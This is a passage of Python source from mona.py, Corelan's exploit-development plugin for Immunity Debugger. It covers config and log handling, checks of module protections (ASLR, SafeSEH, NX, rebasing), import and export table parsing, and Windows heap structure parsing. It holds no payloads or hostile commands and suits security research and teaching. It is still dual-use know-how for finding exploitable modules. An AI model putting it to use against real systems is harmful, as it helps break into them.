paramfound = False
for thisLine in content:
thisLine = thisLine.replace('\n','').replace('\r','')
if not thisLine[0] == "#":
currparam = thisLine.split('=')
if currparam[0].strip().lower() == parameter.strip().lower():
newcontent.append(parameter+"="+paramvalue+"\n")
paramfound = True
else:
newcontent.append(thisLine+"\n")
else:
newcontent.append(thisLine+"\n")
if not paramfound:
newcontent.append(parameter+"="+paramvalue+"\n")
#save new config file (rewrite)
dbg.log("[+] Saving config file, modified parameter %s" % parameter)
FILE=open(self.configfile,"w")
FILE.writelines(newcontent)
FILE.close()
dbg.log(" mona.ini saved under %s" % self.currpath)
except:
dbg.log("Error writing config file : %s : %s" % (sys.exc_type,sys.exc_value),highlight=1)
return ""
else:
#create new file
try:
dbg.log("[+] Creating config file, setting parameter %s" % parameter)
FILE=open(self.configfile,"w")
FILE.write("# -----------------------------------------------#\n")
FILE.write("# !mona.py configuration file #\n")
FILE.write("# Corelan Team - https://www.corelan.be #\n")
FILE.write("# -----------------------------------------------#\n")
FILE.write(parameter+"="+paramvalue+"\n")
FILE.close()
except:
dbg.log(" ** Error writing config file", highlight=1)
return ""
return ""
#---------------------------------------#
# Class to log entries to file #
#---------------------------------------#
class MnLog:
"""
Class to perform logfile operations
"""
def __init__(self, filename):
self.filename = filename
def reset(self,clear=True,showheader=True):
"""
Optionally clears a log file, write a header to the log file and return filename
Optional :
clear = Boolean. When set to false, the logfile won't be cleared. This method can be
used to retrieve the full path to the logfile name of the current MnLog class object
Logfiles are written to the debugger program folder, unless a config value 'workingfolder' is set.
Return:
full path to the logfile name.
"""
global noheader
if clear:
if not silent:
dbg.log("[+] Preparing output file '" + self.filename +"'")
if not showheader:
noheader = True
debuggedname = dbg.getDebuggedName()
thispid = dbg.getDebuggedPid()
if thispid == 0:
debuggedname = "_no_name_"
thisconfig = MnConfig()
workingfolder = thisconfig.get("workingfolder").rstrip("\\").strip()
#strip extension from debuggedname
parts = debuggedname.split(".")
extlen = len(parts[len(parts)-1])+1
debuggedname = debuggedname[0:len(debuggedname)-extlen]
debuggedname = debuggedname.replace(" ","_")
workingfolder = workingfolder.replace('%p', debuggedname)
workingfolder = workingfolder.replace('%i', str(thispid))
logfile = workingfolder + "\\" + self.filename
#does working folder exist ?
if workingfolder != "":
if not os.path.exists(workingfolder):
try:
dbg.log(" - Creating working folder %s" % workingfolder)
#recursively create folders
os.makedirs(workingfolder)
dbg.log(" - Folder created")
except:
dbg.log(" ** Unable to create working folder %s, the debugger program folder will be used instead" % workingfolder,highlight=1)
logfile = self.filename
else:
logfile = self.filename
if clear:
if not silent:
dbg.log(" - (Re)setting logfile %s" % logfile)
try:
if os.path.exists(logfile):
try:
os.delete(logfile+".old")
except:
pass
try:
os.rename(logfile,logfile+".old")
except:
try:
os.rename(logfile,logfile+".old2")
except:
pass
except:
pass
#write header
if not noheader:
try:
with open(logfile,"w") as fh:
fh.write("=" * 80 + '\n')
thisversion,thisrevision = getVersionInfo(inspect.stack()[0][1])
thisversion = thisversion.replace("'","")
fh.write(" Output generated by mona.py v"+thisversion+", rev "+thisrevision+" - " + __DEBUGGERAPP__ + "\n")
fh.write(" Corelan Team - https://www.corelan.be\n")
fh.write("=" * 80 + '\n')
osver=dbg.getOsVersion()
osrel=dbg.getOsRelease()
fh.write(" OS : " + osver + ", release " + osrel + "\n")
fh.write(" Process being debugged : " + debuggedname +" (pid " + str(thispid) + ")\n")
currmonaargs = " ".join(x for x in currentArgs)
fh.write(" Current mona arguments: %s\n" % currmonaargs)
fh.write("=" * 80 + '\n')
fh.write(" " + datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S") + "\n")
fh.write("=" * 80 + '\n')
except:
pass
else:
try:
with open(logfile,"w") as fh:
fh.write("")
except:
pass
#write module table
try:
if not ignoremodules:
showModuleTable(logfile)
except:
pass
return logfile
def write(self,entry,logfile):
"""
Write an entry (can be multiline) to a given logfile
Arguments:
entry - the data to write to the logfile
logfile - the full path to the logfile
Return:
nothing
"""
towrite = ""
#check if entry is int
if type(entry) == int:
if entry > 0:
ptrx = MnPointer(entry)
modname = ptrx.belongsTo()
modinfo = MnModule(modname)
towrite = "0x" + toHex(entry) + " : " + ptrx.__str__() + " " + modinfo.__str__()
else:
towrite = entry
else:
towrite = entry
# if this fails, we got an unprintable character
try:
towrite = str(towrite)
except:
# one at a time
towrite2 = ""
for c in towrite:
try:
towrite2 += str(c)
except:
towrite2 += "\\x" + str(hex(ord(c))).replace("0x","")
towrite = towrite2
try:
with open(logfile,"a") as fh:
if towrite.find('\n') > -1:
fh.writelines(towrite)
else:
fh.write(towrite+"\n")
except:
pass
return True
#---------------------------------------#
# Simple Queue class #
#---------------------------------------#
class MnQueue:
"""
Simple queue class
"""
def __init__(self):
self.holder = []
def enqueue(self,val):
self.holder.append(val)
def dequeue(self):
val = None
try:
val = self.holder[0]
if len(self.holder) == 1:
self.holder = []
else:
self.holder = self.holder[1:]
except:
pass
return val
def IsEmpty(self):
result = False
if len(self.holder) == 0:
result = True
return result
#---------------------------------------#
# Class to access module properties #
#---------------------------------------#
class MnModule:
"""
Class to access module properties
"""
def __init__(self, modulename):
#dbg.log("MnModule(%s)" % modulename)
modisaslr = True
modissafeseh = True
modrebased = True
modisnx = True
modisos = True
self.IAT = {}
self.EAT = {}
path = ""
mzbase = 0
mzsize = 0
mztop = 0
mcodebase = 0
mcodesize = 0
mcodetop = 0
mentry = 0
mversion = ""
self.internalname = modulename
if modulename != "":
# if info is cached, retrieve from cache
if ModInfoCached(modulename):
modisaslr = getModuleProperty(modulename,"aslr")
modissafeseh = getModuleProperty(modulename,"safeseh")
modrebased = getModuleProperty(modulename,"rebase")
modisnx = getModuleProperty(modulename,"nx")
modisos = getModuleProperty(modulename,"os")
path = getModuleProperty(modulename,"path")
mzbase = getModuleProperty(modulename,"base")
mzsize = getModuleProperty(modulename,"size")
mztop = getModuleProperty(modulename,"top")
mversion = getModuleProperty(modulename,"version")
mentry = getModuleProperty(modulename,"entry")
mcodebase = getModuleProperty(modulename,"codebase")
mcodesize = getModuleProperty(modulename,"codesize")
mcodetop = getModuleProperty(modulename,"codetop")
else:
#gather info manually - this code should only get called from populateModuleInfo()
self.moduleobj = dbg.getModule(modulename)
modissafeseh = True
modisaslr = True
modisnx = True
modrebased = False
modisos = False
#if self.moduleobj == None:
# dbg.log("*** Error - self.moduleobj is None, key %s" % modulename, highlight=1)
mod = self.moduleobj
mzbase = mod.getBaseAddress()
mzrebase = mod.getFixupbase()
mzsize = mod.getSize()
mversion = mod.getVersion()
mentry = mod.getEntry()
mcodebase = mod.getCodebase()
mcodesize = mod.getCodesize()
mcodetop = mcodebase + mcodesize
mversion=mversion.replace(", ",".")
mversionfields=mversion.split('(')
mversion=mversionfields[0].replace(" ","")
if mversion=="":
mversion="-1.0-"
path=mod.getPath()
if mod.getIssystemdll() == 0:
modisos = "WINDOWS" in path.upper()
else:
modisos = True
mztop = mzbase + mzsize
if mzbase > 0:
peoffset=struct.unpack('<L',dbg.readMemory(mzbase+0x3c,4))[0]
pebase=mzbase+peoffset
osver=dbg.getOsVersion()
safeseh_offset = [0x5f, 0x5f, 0x5e]
safeseh_flag = [0x4, 0x4, 0x400]
os_index = 0
# Vista / Win7 / Win8
if win7mode:
os_index = 2
flags=struct.unpack('<H',dbg.readMemory(pebase+safeseh_offset[os_index],2))[0]
numberofentries=struct.unpack('<L',dbg.readMemory(pebase+0x74,4))[0]
#safeseh ?
if (flags&safeseh_flag[os_index])!=0:
modissafeseh=True
else:
if numberofentries>10:
sectionaddress,sectionsize=struct.unpack('<LL',dbg.readMemory(pebase+0x78+8*10,8))
sectionaddress+=mzbase
data=struct.unpack('<L',dbg.readMemory(sectionaddress,4))[0]
condition = False
if os_index < 2:
condition=(sectionsize!=0) and ((sectionsize==0x40) or (sectionsize==data))
else:
condition=(sectionsize!=0) and ((sectionsize==0x40))
if condition==False:
modissafeseh=False
else:
sehlistaddress,sehlistsize=struct.unpack('<LL',dbg.readMemory(sectionaddress+0x40,8))
if sehlistaddress!=0 and sehlistsize!=0:
modissafeseh=True
else:
modissafeseh=False
#aslr
if (flags&0x0040)==0: # 'IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE
modisaslr=False
#nx
if (flags&0x0100)==0:
modisnx=False
#rebase
if mzrebase <> mzbase:
modrebased=True
else:
# should never be hit
#print "No module specified !!!"
#print "stacktrace : "
#print traceback.format_exc()
return None
#check if module is excluded
thisconfig = MnConfig()
allexcluded = []
excludedlist = thisconfig.get("excluded_modules")
modfound = False
if excludedlist:
allexcluded = excludedlist.split(',')
for exclentry in allexcluded:
if exclentry.lower().strip() == modulename.lower().strip():
modfound = True
self.isExcluded = modfound
#done - populate variables
self.isAslr = modisaslr
self.isSafeSEH = modissafeseh
self.isRebase = modrebased
self.isNX = modisnx
self.isOS = modisos
self.moduleKey = modulename
self.modulePath = path
self.moduleBase = mzbase
self.moduleSize = mzsize
self.moduleTop = mztop
self.moduleVersion = mversion
self.moduleEntry = mentry
self.moduleCodesize = mcodesize
self.moduleCodetop = mcodetop
self.moduleCodebase = mcodebase
def __str__(self):
#return general info about the module
#modulename + info
"""
Get information about a module (human readable format)
Arguments:
None
Return:
String with various properties about a module
"""
outstring = ""
if self.moduleKey != "":
outstring = "[" + self.moduleKey + "] ASLR: " + str(self.isAslr) + ", Rebase: " + str(self.isRebase) + ", SafeSEH: " + str(self.isSafeSEH) + ", OS: " + str(self.isOS) + ", v" + self.moduleVersion + " (" + self.modulePath + ")"
else:
outstring = "[None]"
return outstring
def isAslr(self):
return self.isAslr
def isSafeSEH(self):
return self.isSafeSEH
def isRebase(self):
return self.isRebase
def isOS(self):
return self.isOS
def isNX(self):
return self.isNX
def moduleKey(self):
return self.moduleKey
def modulePath(self):
return self.modulePath
def moduleBase(self):
return self.moduleBase
def moduleSize(self):
return self.moduleSize
def moduleTop(self):
return self.moduleTop
def moduleEntry(self):
return self.moduleEntry
def moduleCodebase(self):
return self.moduleCodebase
def moduleCodesize(self):
return self.moduleCodesize
def moduleCodetop(self):
return self.moduleCodetop
def moduleVersion(self):
return self.moduleVersion
def isExcluded(self):
return self.isExcluded
def getFunctionCalls(self,criteria={}):
funccalls = {}
sequences = []
sequences.append(["call","\xff\x15"])
funccalls = searchInRange(sequences, self.moduleBase, self.moduleTop,criteria)
return funccalls
def getIAT(self):
IAT = {}
try:
if len(self.IAT) == 0:
themod = dbg.getModule(self.moduleKey)
syms = themod.getSymbols()
thename = ""
for sym in syms:
if syms[sym].getType().startswith("Import"):
thename = syms[sym].getName()
theaddress = syms[sym].getAddress()
if not theaddress in IAT:
IAT[theaddress] = thename
# merge
# find optional header
PEHeader_ref = self.moduleBase + 0x3c
PEHeader_location = self.moduleBase + struct.unpack('<L',dbg.readMemory(PEHeader_ref,4))[0]
# do we have an optional header ?
bsizeOfOptionalHeader = dbg.readMemory(PEHeader_location+0x14,2)
sizeOfOptionalHeader = struct.unpack('<L',bsizeOfOptionalHeader+"\x00\x00")[0]
OptionalHeader_location = PEHeader_location + 0x18
if sizeOfOptionalHeader > 0:
# get address of DataDirectory
DataDirectory_location = OptionalHeader_location + 0x60
# get size of Import Table
importtable_size = struct.unpack('<L',dbg.readMemory(DataDirectory_location+0x64,4) )[0]
importtable_rva = struct.unpack('<L',dbg.readMemory(DataDirectory_location+0x60,4) )[0]
iatAddr = self.moduleBase + importtable_rva
max_nr_entries = importtable_size / 4
iatcnt = 0
while iatcnt < max_nr_entries:
thisloc = iatAddr + (4*iatcnt)
iatEntry = struct.unpack('<L',dbg.readMemory(thisloc,4) )[0]
if iatEntry > 0:
ptr = iatEntry
ptrx = MnPointer(iatEntry)
modname = ptrx.belongsTo()
tmod = MnModule(modname)
thisfunc = dbglib.Function(dbg,ptr)
thisfuncfullname = thisfunc.getName().lower()
if thisfuncfullname.endswith(".unknown") or thisfuncfullname.endswith(".%08x" % ptr):
if not tmod is None:
imagename = tmod.getShortName()
eatlist = tmod.getEAT()
if iatEntry in eatlist:
thisfuncfullname = "." + imagename + "!" + eatlist[iatEntry]
thisfuncname = thisfuncfullname.split('.')
IAT[thisloc] = thisfuncname[1].strip(">")
else:
IAT[thisloc] = imagename + "!0x%08x" % iatEntry
else:
IAT[thisloc] = thisfuncfullname.replace(".","!")
iatcnt += 1
if len(IAT) == 0:
#search method nr 2, not accurate, but will find *something*
funccalls = self.getFunctionCalls()
for functype in funccalls:
for fptr in funccalls[functype]:
ptr=struct.unpack('<L',dbg.readMemory(fptr+2,4))[0]
if ptr >= self.moduleBase and ptr <= self.moduleTop:
if not ptr in IAT:
thisfunc = dbglib.Function(dbg,ptr)
thisfuncfullname = thisfunc.getName().lower()
thisfuncname = []
if thisfuncfullname.endswith(".unknown") or thisfuncfullname.endswith(".%08x" % ptr):
iatptr = struct.unpack('<L',dbg.readMemory(ptr,4))[0]
# see if we can find the original function name using the EAT
tptr = MnPointer(ptr)
modname = tptr.belongsTo()
tmod = MnModule(modname)
ofullname = thisfuncfullname
if not tmod is None:
imagename = tmod.getShortName()
eatlist = tmod.getEAT()
if iatptr in eatlist:
thisfuncfullname = "." + imagename + "!" + eatlist[iatptr]
if thisfuncfullname == ofullname:
tparts = thisfuncfullname.split('.')
thisfuncfullname = tparts[0] + (".%08x" % iatptr)
thisfuncname = thisfuncfullname.split('.')
IAT[ptr] = thisfuncname[1].strip(">")
self.IAT = IAT
else:
IAT = self.IAT
except:
import traceback
dbg.logLines(traceback.format_exc())
return IAT
return IAT
def getEAT(self):
eatlist = {}
if len(self.EAT) == 0:
try:
# avoid major suckage, let's do it ourselves
# find optional header
PEHeader_ref = self.moduleBase + 0x3c
PEHeader_location = self.moduleBase + struct.unpack('<L',dbg.readMemory(PEHeader_ref,4))[0]
# do we have an optional header ?
bsizeOfOptionalHeader = dbg.readMemory(PEHeader_location+0x14,2)
sizeOfOptionalHeader = struct.unpack('<L',bsizeOfOptionalHeader+"\x00\x00")[0]
OptionalHeader_location = PEHeader_location + 0x18
if sizeOfOptionalHeader > 0:
# get address of DataDirectory
DataDirectory_location = OptionalHeader_location + 0x60
# get size of Export Table
exporttable_size = struct.unpack('<L',dbg.readMemory(DataDirectory_location+4,4) )[0]
exporttable_rva = struct.unpack('<L',dbg.readMemory(DataDirectory_location,4) )[0]
if exporttable_size > 0:
# get start of export table
eatAddr = self.moduleBase + exporttable_rva
nr_of_names = struct.unpack('<L',dbg.readMemory(eatAddr + 0x18,4))[0]
rva_of_names = self.moduleBase + struct.unpack('<L',dbg.readMemory(eatAddr + 0x20,4))[0]
address_of_functions = self.moduleBase + struct.unpack('<L',dbg.readMemory(eatAddr + 0x1c,4))[0]
for i in range(0, nr_of_names):
eatName = dbg.readString(self.moduleBase + struct.unpack('<L',dbg.readMemory(rva_of_names + (4 * i),4))[0])
eatAddress = self.moduleBase + struct.unpack('<L',dbg.readMemory(address_of_functions + (4 * i),4))[0]
eatlist[eatAddress] = eatName
self.EAT = eatlist
except:
return eatlist
else:
eatlist = self.EAT
return eatlist
def getShortName(self):
return stripExtension(self.moduleKey)
def getNtGlobalFlag():
pebaddress = dbg.getPEBAddress()
global NtGlobalFlag
if NtGlobalFlag == -1:
try:
NtGlobalFlag = struct.unpack('<L',dbg.readMemory(pebaddress+0x068,4))[0]
except:
NtGlobalFlag = 0
return NtGlobalFlag
def getNtGlobalFlagDefinitions():
definitions = {}
definitions[0x0] = ["","No GFlags enabled"]
definitions[0x00000001] = ["soe", "Stop On Execute"]
definitions[0x00000002] = ["sls", "Show Loader Snaps"]
definitions[0x00000004] = ["dic", "Debug Initial Command"]
definitions[0x00000008] = ["shg", "Stop On Hung GUI"]
definitions[0x00000010] = ["htc", "Enable Heap Tail Checking"]
definitions[0x00000020] = ["hfc", "Enable Heap Free Checking"]
definitions[0x00000040] = ["hpc", "Enable Heap Parameter Checking"]
definitions[0x00000080] = ["hvc", "Enable Heap Validation On Call"]
definitions[0x00000100] = ["vrf", "Enable Application Verifier"]
definitions[0x00000200] = [" ", "Enable Silent Process Exit Monitoring"]
if not win7mode:
definitions[0x00000400] = ["ptg", "Enable Pool Tagging"]
definitions[0x00000800] = ["htg", "Enable Heap Tagging"]
definitions[0x00001000] = ["ust", "Create User Mode Stack Trace"]
definitions[0x00002000] = ["kst", "Create Kernel Mode Stack Trace"]
definitions[0x00004000] = ["otl", "Maintain A List Of Objects For Each Type"]
definitions[0x00008000] = ["htd", "Enable Heap Tagging By DLL"]
definitions[0x00010000] = ["dse", "Disable Stack Extension"]
definitions[0x00020000] = ["d32", "Enable Debugging Of Win32 Subsystem"]
definitions[0x00040000] = ["ksl", "Enable Loading Of Kernel Debugger Symbols"]
definitions[0x00080000] = ["dps", "Disable Paging Of Kernel Stacks"]
definitions[0x00100000] = ["scb", "Enable System Critical Breaks"]
definitions[0x00200000] = ["dhc", "Disable Heap Coalesce On Free"]
definitions[0x00400000] = ["ece", "Enable Close Exception"]
definitions[0x00800000] = ["eel", "Enable Exception Logging"]
definitions[0x01000000] = ["eot", "Early Object Handle Type Tagging"]
definitions[0x02000000] = ["hpa", "Enable Page Heap"]
definitions[0x04000000] = ["dwl", "Debug WinLogon"]
definitions[0x08000000] = ["ddp", "Buffer DbgPrint Output"]
definitions[0x10000000] = ["cse", "Early Critical Section Event Creation"]
definitions[0x40000000] = ["bhd", "Disable Bad Handles Detection"]
definitions[0x80000000] = ["dpd", "Disable Protected DLL Verification"]
return definitions
def getNtGlobalFlagValues(flag):
allvalues = []
for defvalue in getNtGlobalFlagDefinitions():
if defvalue > 0:
allvalues.append(defvalue)
# sort list descending
allvalues.sort(reverse=True)
flagvalues = []
remaining = flag
for flagvalue in allvalues:
if flagvalue <= remaining:
remaining -= flagvalue
if remaining >= 0:
flagvalues.append(flagvalue)
return flagvalues
def getNtGlobalFlagNames(flag):
names = []
allvalues = getNtGlobalFlagDefinitions()
currentvalues = getNtGlobalFlagValues(flag)
for defvalue in currentvalues:
if defvalue > 0:
names.append(allvalues[defvalue][0])
return names
def getNtGlobalFlagValueData(flagvalue):
toreturn = ["",""]
if flagvalue in getNtGlobalFlagDefinitions():
toreturn = getNtGlobalFlagDefinitions()[flagvalue]
return toreturn
def getActiveFlagNames(flagvalue):
currentflags = getNtGlobalFlagValues(flagvalue)
flagdefs = getNtGlobalFlagDefinitions()
flagnames = []
if len(currentflags) == 0:
currentflags = [0]
for flag in currentflags:
if flag in flagdefs:
flagdata = flagdefs[flag]
flagnames.append(flagdata[0])
return ",".join(flagnames)
def getNtGlobalFlagValueName(flagvalue):
data = getNtGlobalFlagValueData(flagvalue)
toreturn = ""
if data[0] != "":
toreturn += "+" + data[0]
else:
toreturn += " "
toreturn += " - "
toreturn += data[1]
return toreturn
#---------------------------------------#
# Class for heap structures #
#---------------------------------------#
class MnHeap:
"""
Class for heap structures
"""
heapbase = 0
EncodeFlagMask = 0
Encoding = 0
# _HEAP
# Windows XP
# ----------
# +0x000 Entry : _HEAP_ENTRY
# +0x008 Signature : Uint4B
# +0x00c Flags : Uint4B
# +0x010 ForceFlags : Uint4B
# +0x014 VirtualMemoryThreshold : Uint4B
# +0x018 SegmentReserve : Uint4B
# +0x01c SegmentCommit : Uint4B
# +0x020 DeCommitFreeBlockThreshold : Uint4B
# +0x024 DeCommitTotalFreeThreshold : Uint4B
# +0x028 TotalFreeSize : Uint4B
# +0x02c MaximumAllocationSize : Uint4B
# +0x030 ProcessHeapsListIndex : Uint2B
# +0x032 HeaderValidateLength : Uint2B
# +0x034 HeaderValidateCopy : Ptr32 Void
# +0x038 NextAvailableTagIndex : Uint2B
# +0x03a MaximumTagIndex : Uint2B
# +0x03c TagEntries : Ptr32 _HEAP_TAG_ENTRY
# +0x040 UCRSegments : Ptr32 _HEAP_UCR_SEGMENT
# +0x044 UnusedUnCommittedRanges : Ptr32 _HEAP_UNCOMMMTTED_RANGE
# +0x048 AlignRound : Uint4B
# +0x04c AlignMask : Uint4B
# +0x050 VirtualAllocdBlocks : _LIST_ENTRY
# +0x058 Segments : [64] Ptr32 _HEAP_SEGMENT
# +0x158 u : __unnamed
# +0x168 u2 : __unnamed
# +0x16a AllocatorBackTraceIndex : Uint2B
# +0x16c NonDedicatedListLength : Uint4B
# +0x170 LargeBlocksIndex : Ptr32 Void
# +0x174 PseudoTagEntries : Ptr32 _HEAP_PSEUDO_TAG_ENTRY
# +0x178 FreeLists : [128] _LIST_ENTRY
# +0x578 LockVariable : Ptr32 _HEAP_LOCK
# +0x57c CommitRoutine : Ptr32 long
# +0x580 FrontEndHeap : Ptr32 Void
# +0x584 FrontHeapLockCount : Uint2B
# +0x586 FrontEndHeapType : UChar
# +0x587 LastSegmentIndex : UChar
# Windows 7
# ---------
# +0x000 Entry : _HEAP_ENTRY
# +0x008 SegmentSignature : Uint4B
# +0x00c SegmentFlags : Uint4B
# +0x010 SegmentListEntry : _LIST_ENTRY
# +0x018 Heap : Ptr32 _HEAP
# +0x01c BaseAddress : Ptr32 Void
# +0x020 NumberOfPages : Uint4B
# +0x024 FirstEntry : Ptr32 _HEAP_ENTRY
# +0x028 LastValidEntry : Ptr32 _HEAP_ENTRY
# +0x02c NumberOfUnCommittedPages : Uint4B
# +0x030 NumberOfUnCommittedRanges : Uint4B
# +0x034 SegmentAllocatorBackTraceIndex : Uint2B
# +0x036 Reserved : Uint2B
# +0x038 UCRSegmentList : _LIST_ENTRY
# +0x040 Flags : Uint4B
# +0x044 ForceFlags : Uint4B
# +0x048 CompatibilityFlags : Uint4B
# +0x04c EncodeFlagMask : Uint4B
# +0x050 Encoding : _HEAP_ENTRY
# +0x058 PointerKey : Uint4B
# +0x05c Interceptor : Uint4B
# +0x060 VirtualMemoryThreshold : Uint4B
# +0x064 Signature : Uint4B
# +0x068 SegmentReserve : Uint4B
# +0x06c SegmentCommit : Uint4B
# +0x070 DeCommitFreeBlockThreshold : Uint4B
# +0x074 DeCommitTotalFreeThreshold : Uint4B
# +0x078 TotalFreeSize : Uint4B
# +0x07c MaximumAllocationSize : Uint4B
# +0x080 ProcessHeapsListIndex : Uint2B
# +0x082 HeaderValidateLength : Uint2B
# +0x084 HeaderValidateCopy : Ptr32 Void
# +0x088 NextAvailableTagIndex : Uint2B
# +0x08a MaximumTagIndex : Uint2B
# +0x08c TagEntries : Ptr32 _HEAP_TAG_ENTRY
# +0x090 UCRList : _LIST_ENTRY
# +0x098 AlignRound : Uint4B
# +0x09c AlignMask : Uint4B
# +0x0a0 VirtualAllocdBlocks : _LIST_ENTRY
# +0x0a8 SegmentList : _LIST_ENTRY
# +0x0b0 AllocatorBackTraceIndex : Uint2B
# +0x0b4 NonDedicatedListLength : Uint4B
# +0x0b8 BlocksIndex : Ptr32 Void
# +0x0bc UCRIndex : Ptr32 Void
# +0x0c0 PseudoTagEntries : Ptr32 _HEAP_PSEUDO_TAG_ENTRY
# +0x0c4 FreeLists : _LIST_ENTRY
# +0x0cc LockVariable : Ptr32 _HEAP_LOCK
# +0x0d0 CommitRoutine : Ptr32 long
# +0x0d4 FrontEndHeap : Ptr32 Void
# +0x0d8 FrontHeapLockCount : Uint2B
# +0x0da FrontEndHeapType : UChar
# +0x0dc Counters : _HEAP_COUNTERS
# +0x130 TuningParameters : _HEAP_TUNING_PARAMETERS
def __init__(self,address):
self.heapbase = address
self.VirtualAllocdBlocks = {}
self.LookAsideList = {}
self.SegmentList = {}
self.lalheads = {}
self.Encoding = 0
self.FrontEndHeap = 0
return None
def getEncodingKey(self):
"""
Retrieves the Encoding key from the current heap
Return: Int, containing the Encoding key (on Windows 7 and up)
or zero on older Operating Systems
"""
self.Encoding = 0
if win7mode:
offset = archValue(0x4c,0x7c)
self.EncodeFlagMask = struct.unpack('<L',dbg.readMemory(self.heapbase+offset,4))[0]
if self.EncodeFlagMask == 0x100000:
if arch == 32:
self.Encoding = struct.unpack('<L',dbg.readMemory(self.heapbase+0x50,4))[0]
elif arch == 64:
self.Encoding = struct.unpack('<L',dbg.readMemory(self.heapbase+0x80+0x8,4))[0]
return self.Encoding
def getHeapChunkHeaderAtAddress(self,thischunk,headersize=8,type="chunk"):
"""
Will convert the bytes placed at a certain address into an MnChunk object
"""
key = self.getEncodingKey()
fullheaderbin = ""
if type == "chunk" or type == "lal" or type == "freelist":
chunktype = "chunk"
if key == 0 and not win7mode:
fullheaderbin = dbg.readMemory(thischunk,headersize)
else:
fullheaderbin = decodeHeapHeader(thischunk,headersize,key)
# if we have heap corruption, thischunk may not be a readable address
# so fullheaderbin would be empty
if len(fullheaderbin) == headersize:
sizebytes = fullheaderbin[0:2]
thissize = struct.unpack('<H',sizebytes)[0]
prevsize = 0
segmentid = 0
flag = 0
unused = 0
tag = 0
if key == 0 and not win7mode:
prevsize = struct.unpack('<H',fullheaderbin[2:4])[0]
segmentid = struct.unpack('<B',fullheaderbin[4:5])[0]
flag = struct.unpack('<B',fullheaderbin[5:6])[0]
unused = struct.unpack('<B',fullheaderbin[6:7])[0]
tag = struct.unpack('<B',fullheaderbin[7:8])[0]
else:
flag = struct.unpack('<B',fullheaderbin[2:3])[0]
tag = struct.unpack('<B',fullheaderbin[3:4])[0]
prevsize = struct.unpack('<H',fullheaderbin[4:6])[0]
segmentid = struct.unpack('<B',fullheaderbin[6:7])[0]
unused = struct.unpack('<B',fullheaderbin[7:8])[0]
flink = 0
blink = 0
if type == "lal" or type == "freelist":
flink = struct.unpack('<L',dbg.readMemory(thischunk+headersize,4))[0]
if type == "freelist":
blink = struct.unpack('<L',dbg.readMemory(thischunk+headersize+4,4))[0]
return MnChunk(thischunk,chunktype,headersize,self.heapbase,0,thissize,prevsize,segmentid,flag,unused,tag,flink,blink)
else:
return MnChunk(thischunk,chunktype,headersize,self.heapbase,0,0,0,0,0,0,0,0,0)
return None
def getFrontEndHeap(self):
"""
Returns the value of the FrontEndHeap field in the heapbase
"""
return readPtrSizeBytes(self.heapbase+getOsOffset("FrontEndHeap"))
def getFrontEndHeapType(self):
"""
Returns the value of the FrontEndHeapType field in the heapbase
"""
return struct.unpack('B',dbg.readMemory(self.heapbase+getOsOffset("FrontEndHeapType"),1))[0]
def getLookAsideHead(self):
"""
Returns the LookAside List Head as a dictionary of dictionaries
"""
if not win7mode:
self.FrontEndHeap = self.getFrontEndHeap()
self.FrontEndHeapType = self.getFrontEndHeapType()
if self.FrontEndHeap > 0 and self.FrontEndHeapType == 0x1 and len(self.lalheads) == 0:
lalindex = 0
startloc = self.FrontEndHeap
while lalindex < 128:
thisptr = self.FrontEndHeap + (0x30 * lalindex)
lalheadfields = {}
# read the next 0x30 bytes and break down into lal head elements
lalheadbin = dbg.readMemory(thisptr,0x30)
lalheadfields["Next"] = struct.unpack('<L',lalheadbin[0:4])[0]
lalheadfields["Depth"] = struct.unpack('<H',lalheadbin[4:6])[0]
lalheadfields["Sequence"] = struct.unpack('<H',lalheadbin[6:8])[0]
lalheadfields["Depth2"] = struct.unpack('<H',lalheadbin[8:0xa])[0]
lalheadfields["MaximumDepth"] = struct.unpack('<H',lalheadbin[0xa:0xc])[0]
lalheadfields["TotalAllocates"] = struct.unpack('<L',lalheadbin[0xc:0x10])[0]
lalheadfields["AllocateMisses"] = struct.unpack('<L',lalheadbin[0x10:0x14])[0]
lalheadfields["AllocateHits"] = struct.unpack('<L',lalheadbin[0x10:0x14])[0]
lalheadfields["TotalFrees"] = struct.unpack('<L',lalheadbin[0x14:0x18])[0]
lalheadfields["FreeMisses"] = struct.unpack('<L',lalheadbin[0x18:0x1c])[0]
lalheadfields["FreeHits"] = struct.unpack('<L',lalheadbin[0x18:0x1c])[0]
lalheadfields["Type"] = struct.unpack('<L',lalheadbin[0x1c:0x20])[0]
lalheadfields["Tag"] = struct.unpack('<L',lalheadbin[0x20:0x24])[0]
lalheadfields["Size"] = struct.unpack('<L',lalheadbin[0x24:0x28])[0]
lalheadfields["Allocate"] = struct.unpack('<L',lalheadbin[0x28:0x2c])[0]
lalheadfields["Free"] = struct.unpack('<L',lalheadbin[0x2c:0x30])[0]
self.lalheads[lalindex] = lalheadfields
lalindex += 1
return self.lalheads
def showLookAsideHead(self,lalindex):
if len(self.lalheads) == 0:
self.getLookAsideHead()
if lalindex in self.lalheads:
thislalhead = self.lalheads[lalindex]
dbg.log(" Next: 0x%08x" % thislalhead["Next"])
dbg.log(" Depth: 0x%04x" % thislalhead["Depth"])
dbg.log(" Sequence: 0x%04x" % thislalhead["Sequence"])
dbg.log(" Depth2: 0x%04x" % thislalhead["Depth2"])
dbg.log(" MaximumDepth: 0x%04x" % thislalhead["MaximumDepth"])
dbg.log(" TotalAllocates: 0x%08x" % thislalhead["TotalAllocates"])
dbg.log(" AllocateMisses/AllocateHits: 0x%08x" % thislalhead["AllocateMisses"])
dbg.log(" TotalFrees: 0x%08x" % thislalhead["TotalFrees"])
dbg.log(" FreeMisses/FreeHits: 0x%08x" % thislalhead["FreeMisses"])
dbg.log(" Type 0x%08x" % thislalhead["Type"])
dbg.log(" Tag: 0x%08x" % thislalhead["Tag"])
dbg.log(" Size: 0x%08x" % thislalhead["Size"])
dbg.log(" Allocate: 0x%08x" % thislalhead["Allocate"])
dbg.log(" Free: 0x%08x" % thislalhead["AllocateMisses"])
return
def getLookAsideList(self):
"""
Retrieves the LookAsideList (if enabled) for the current heap
Returns : a dictionary, key = LAL index
Each element in the dictionary contains a dictionary, using a sequence nr as key,
and each element in this dictionary contains an MnChunk object
"""
lal = {}
if not win7mode:
self.FrontEndHeap = self.getFrontEndHeap()
self.FrontEndHeapType = self.getFrontEndHeapType()
if self.FrontEndHeap > 0 and self.FrontEndHeapType == 0x1:
lalindex = 0
startloc = self.FrontEndHeap
while lalindex < 128:
thisptr = self.FrontEndHeap + (0x30 * lalindex)
